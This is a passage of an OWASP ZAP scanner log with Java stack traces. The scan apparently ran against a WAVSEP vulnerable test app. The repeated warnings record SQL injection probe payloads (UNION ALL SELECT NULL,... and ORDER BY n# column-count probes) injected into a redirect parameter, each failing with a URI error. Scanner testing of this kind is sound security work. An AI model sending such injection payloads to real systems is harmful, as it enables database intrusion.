org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681847 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681847 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681848 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681848 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681849 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681850 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681850 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681851 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681851 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681852 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com) ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com) ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681853 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681853 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com) ORDER BY 5674#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com) ORDER BY 5674# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681854 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at 